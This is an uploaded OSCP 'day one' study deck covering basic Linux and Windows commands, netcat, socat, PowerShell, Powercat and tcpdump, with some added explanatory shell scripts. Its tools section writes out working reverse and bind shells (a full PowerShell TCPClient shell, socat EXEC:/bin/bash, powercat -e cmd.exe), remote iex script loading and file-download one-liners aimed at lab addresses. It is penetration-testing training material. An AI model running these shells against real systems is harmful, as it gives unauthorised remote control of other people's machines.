OSCP Day1

This document provides an overview of common Linux and Windows commands as well as practical tools used in penetration testing. It begins with basic commands for navigating files and directories, viewing file contents, finding files, and managing permissions. Next it covers networking tools like netcat, socat, PowerShell, and Powercat that can be used to transfer files and create various types of shells. It concludes with an introduction to tcpdump for capturing and analyzing network traffic. The document is intended as a day one reference for the OSCP certification which focuses on hands-on penetration testing skills.

Uploaded by

fa1c0n king

OSCP DAY1

Table of Contents
• Command Line Fun
• Practical Tools
BASIC LINUX & WINDOWS COMMANDS
Linux Commands
The Shell – Bash
The shell, or the terminal, is a really useful tool. Bash is the standard shell on most Linux distros.

• Navigating
pwd - Print working directory
cd - Change directory
cd ~ - Change directory to your home directory
Linux Commands
• Looking at files
ls - List files in directory
ls -ltr - Long listing sorted by modification time, oldest first (-l long format, -t sort by time, -r reverse).
file - Show information about a file, e.g. whether it is a binary or a text file.
cat - Output the content of a file.
more - Output a file one screen at a time; less is the better choice.
Linux Commands
• A little bit of everything
history - Show the command history
sudo -l - List what commands the current user may run with sudo.

Sudo config file is usually /etc/sudoers


Linux Commands
• Working with files
touch - Create a new file.
cp - Copy
mkdir - Make directory.

rm - Remove file
Linux Commands
• Find
find is slower than locate but a lot more thorough. It can search for files recursively, match names by regex, and filter on many other criteria.
Linux Commands
• Locate
locate is really fast because it relies on an internal database, so to have that database updated you need to run:

Then you can easily find stuff like this:


Linux Commands
• Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
Linux Commands
• filters
There are certain programs that are especially useful to use together with pipes. They can also be used as stand-alone programs, but you will often see them together with pipes.
sort

uniq

grep
head
tail
tr
Linux Commands
• cut
Cut by column
cut is a useful command for cutting columns out of text.
Let's say we have the following text and want to cut out the IP address.

-d stands for delimiter and -f for field.


Linux Commands
• tr – Translate
Transform all letters into capital letters

Example
Remove a character
cat file.txt | tr -d "."
Linux Commands
• awk
awk is an advanced tool for editing text files. It is its own programming language, so it can become quite complex. awk iterates over the whole file line by line.
This is the basic structure of an awk command
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

The search pattern takes a regex.


Either the search portion or the action portion can be omitted.
With neither restriction, the command just prints every line of the file.
Linux Commands
• awk
Filtering for a specific IP address:

Now we want to print the fourth column of that file. We could pipe this to cut, but awk can do it as well, like this:

We can use the -F flag to set a custom delimiter.


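As an added example (not code from the deck), the cut, awk -F, tr and sort | uniq -c filters above applied to constructed lines in the shape of tcpdump -n output, the same column layout the tcpdump section later counts with awk '{print $3}': field 3 is src.port, awk -F. strips the port, and the pipeline counts connections per source. All sample lines are constructed.

```shell
#!/bin/sh
# Added example, not from the original deck.  The lines below are constructed
# to look like "tcpdump -n" output: time proto src.port > dst.port: flags ...
SAMPLE_LINES='08:52:01.123 IP 172.16.40.10.39440 > 172.16.40.1.81: Flags [S], seq 1
08:52:01.130 IP 172.16.40.1.81 > 172.16.40.10.39440: Flags [S.], seq 2
08:52:01.131 IP 172.16.40.10.39441 > 172.16.40.1.81: Flags [S], seq 3
08:52:02.200 IP 10.11.0.4.51000 > 172.16.40.1.81: Flags [P.], seq 4
08:52:02.201 IP 172.16.40.10.39442 > 172.16.40.1.81: Flags [S], seq 5'

# cut -d' ' -f3: field 3 is "src.port" (the same column the deck's awk '{print $3}' picks).
src_with_port() { printf '%s\n' "$SAMPLE_LINES" | cut -d' ' -f3; }

# awk -F. uses "." as the delimiter; the first four fields are the IPv4
# address and the fifth is the port, so reassemble just the address.
strip_port() { awk -F. '{ print $1 "." $2 "." $3 "." $4 }'; }

# Connections per source, busiest first: sort | uniq -c | sort -rn.
# uniq -c prints "count value"; the final awk swaps that to "value count".
top_talkers() {
  src_with_port | strip_port | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# The single source with the most connections (head, then cut, as in the deck).
busiest_source() { top_talkers | head -n 1 | cut -d' ' -f1; }

# tr -d removes characters: strip the brackets and comma around the flags
# field (field 7), leaving e.g. "S." for a SYN-ACK.
flags_only() { printf '%s\n' "$SAMPLE_LINES" | awk '{ print $7 }' | tr -d '[],'; }

top_talkers
```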
Linux Commands
• Permissions

Shows all the files and directories and their permission settings.

Each line starts with 10 characters. The first one, d, shows that it is a directory.
The remaining nine come in three groups of r for read, w for write and x for execute (a dash means that permission is not set). The first group belongs to the owner, the second to the group, and the third to all other users.

→ https://linuxjourney.com/lesson/file-permissions
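An added example, not from the deck, that decodes the 10-character mode string described above: each rwx triplet becomes its octal digit (r=4, w=2, x=1), and a check flags entries whose last group (all other users) includes w. The ls -l lines are constructed sample data; setuid/setgid/sticky bits are only counted as the x position here.

```shell
#!/bin/sh
# Added example, not from the original deck: decode "ls -l" mode strings.

# One rwx triplet -> 0..7 (r=4, w=2, x=1); s/S/t/T occupy the x slot.
triplet_value() {
  t=$1; n=0
  case "$t" in r??) n=$((n + 4)) ;; esac
  case "$t" in ?w?) n=$((n + 2)) ;; esac
  case "$t" in ??[xst]) n=$((n + 1)) ;; esac
  echo "$n"
}

# "drwxr-xr-x" -> "directory 755": type letter, then owner/group/other digits.
decode_mode() {
  m=$1
  case "$m" in d*) kind=directory ;; l*) kind=symlink ;; -*) kind=file ;; *) kind=other ;; esac
  owner=$(triplet_value "$(printf '%s\n' "$m" | cut -c2-4)")
  group=$(triplet_value "$(printf '%s\n' "$m" | cut -c5-7)")
  other=$(triplet_value "$(printf '%s\n' "$m" | cut -c8-10)")
  echo "$kind $owner$group$other"
}

# True when character 9 (write bit of the "all other users" group) is w.
# The trailing * tolerates the "." or "+" some ls builds append for ACLs.
is_world_writable() {
  case "$1" in ????????w?*) return 0 ;; *) return 1 ;; esac
}

# Constructed ls -l lines; list the names any user on the box can modify.
SAMPLE_LS='drwxr-xr-x 2 root root 4096 Jan 1 10:00 bin
-rwxrwxrwx 1 kali kali  120 Jan 1 10:01 deploy.sh
-rw-r--r-- 1 root root   42 Jan 1 10:02 notes.txt
drwxrwxrwt 5 root root 4096 Jan 1 10:03 tmp'

world_writable_names() {
  printf '%s\n' "$SAMPLE_LS" | while read -r mode rest; do
    if is_world_writable "$mode"; then echo "$rest" | awk '{ print $NF }'; fi
  done
}

world_writable_names
```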
Windows Commands
• Show hidden files

• Print out file content, like cat

• Search inside files, like grep
Windows Commands
• Processes
List processes
tasklist

Kill a process
taskkill /PID 1532 /F
Windows Commands
• Users
PRACTICAL TOOLS
Practical Tools
• Netcat
• Socat
• PowerShell and Powercat
• Tcpdump
Practical Tools - netcat
• netcat
Listening on TCP/UDP Port
Windows → nc.exe -nlvp 4444
Linux → nc -nlvp 4444
Practical Tools - netcat
• netcat
Netcat Bind Shell
Practical Tools - netcat
• netcat
Netcat reverse Shell
Practical Tools - netcat
• Transferring Files with Netcat
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
Practical Tools - socat
• Netcat vs Socat
First, let’s connect to a remote server on port 80 using both Netcat and socat:
kali@kali:~$ nc <remote server's ip address> 80
kali@kali:~$ socat - TCP4:<remote server's ip address>:80

kali@kali:~$ sudo nc -lvp localhost 443


kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUT
Practical Tools - socat
• Socat File Transfers
kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create


C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"
Practical Tools - socat
• Socat Reverse Shells
C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
kali@kali:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
Practical Tools - PowerShell and Powercat
• Unrestricted
PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted
PS C:\WINDOWS\system32> Get-ExecutionPolicy
Practical Tools - PowerShell and Powercat
• PowerShell File Transfers
C:\Users\offsec> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Practical Tools - PowerShell and Powercat
• PowerShell Reverse Shells
Using nc to set up a listener in order to receive a reverse shell
kali@kali:~$ sudo nc -lnvp 443
Practical Tools - PowerShell and Powercat
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Practical Tools - PowerShell and Powercat
• PowerShell Bind Shells
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
Practical Tools - PowerShell and Powercat
• PowerShell Bind Shells
kali@kali:~$ nc -nv 10.11.0.22 443
Practical Tools - PowerShell and Powercat
• Powercat
Powercat can be installed in Kali with apt install powercat, which will place the script in /usr/share/windows-resources/powercat.
Practical Tools - PowerShell and Powercat
• Powercat
Loading a remote PowerShell script using iex
PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Practical Tools - PowerShell and Powercat
• Powercat File Transfers
kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
Practical Tools - PowerShell and Powercat
• Powercat Reverse Shells
kali@kali:~$ sudo nc -lvp 443
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
Practical Tools - PowerShell and Powercat
• Powercat Bind Shells
Using powercat to set up a bind shell
PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe

Using nc to connect to a bind shell created by powercat


kali@kali:~$ nc 10.11.0.22 443
Practical Tools - PowerShell and Powercat
• Powercat Stand-Alone Payloads
Creating and executing a stand-alone payload
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

Receiving a stand-alone reverse shell


kali@kali:~$ sudo nc -lnvp 443

Executing a stand-alone payload using PowerShell


PS C:\Users\offsec> powershell.exe ./reverseshell.ps1
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to write and then read a packet capture
kali@kali:~$ sudo tcpdump -i eth0 -w password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap

Using tcpdump to read and filter the packet capture


kali@kali:~$ sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c | head
Practical Tools - tcpdump
• tcpdump
Using tcpdump filters
kali@kali:~$ sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to read the packet capture in hex/ASCII output
kali@kali:~$ sudo tcpdump -nX -r password_cracking_filtered.pcap

Using tcpdump with some advanced filtering


kali@kali:~$ sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
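An added example, not part of the deck, showing where the 24 in 'tcp[13] = 24' comes from: tcp[13] is the TCP flags byte, PSH is bit 8 and ACK is bit 16, so = 24 matches segments with exactly PSH and ACK set. A mask form is included for when the filter should match a flag whatever else is set (a plain tcp[13] = 2 would miss SYN-ACK, which is 18).

```shell
#!/bin/sh
# Added example, not from the original deck: build and decode tcp[13] filters.
# tcp[13] is the TCP flags byte; each flag is one bit:
#   FIN=1  SYN=2  RST=4  PSH=8  ACK=16  URG=32
flag_bit() {
  case "$1" in
    FIN) echo 1 ;;  SYN) echo 2 ;;  RST) echo 4 ;;
    PSH) echo 8 ;;  ACK) echo 16 ;; URG) echo 32 ;;
    *) echo "unknown flag: $1" >&2; return 1 ;;
  esac
}

# Sum the bits of the named flags, e.g. tcp_flags_value PSH ACK -> 24
tcp_flags_value() {
  total=0
  for f in "$@"; do
    bit=$(flag_bit "$f") || return 1
    total=$((total + bit))
  done
  echo "$total"
}

# Reverse direction: a flags byte back to names, e.g. 24 -> "PSH ACK"
tcp_flags_names() {
  v=$1; out=""
  for f in FIN SYN RST PSH ACK URG; do
    bit=$(flag_bit "$f")
    if [ $((v & bit)) -ne 0 ]; then out="$out $f"; fi
  done
  echo "${out# }"
}

# Exact match: only segments whose flags are precisely the ones named.
exact_filter() { echo "tcp[13] = $(tcp_flags_value "$@")"; }

# Mask match: segments that have these flags set, whatever else is set.
# Use this for "every SYN", since a SYN-ACK has value 18, not 2.
mask_filter() {
  v=$(tcp_flags_value "$@")
  echo "tcp[13] & $v = $v"
}

exact_filter PSH ACK    # tcp[13] = 24  (the deck's filter)
mask_filter SYN         # tcp[13] & 2 = 2
tcp_flags_names 18      # SYN ACK
```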
END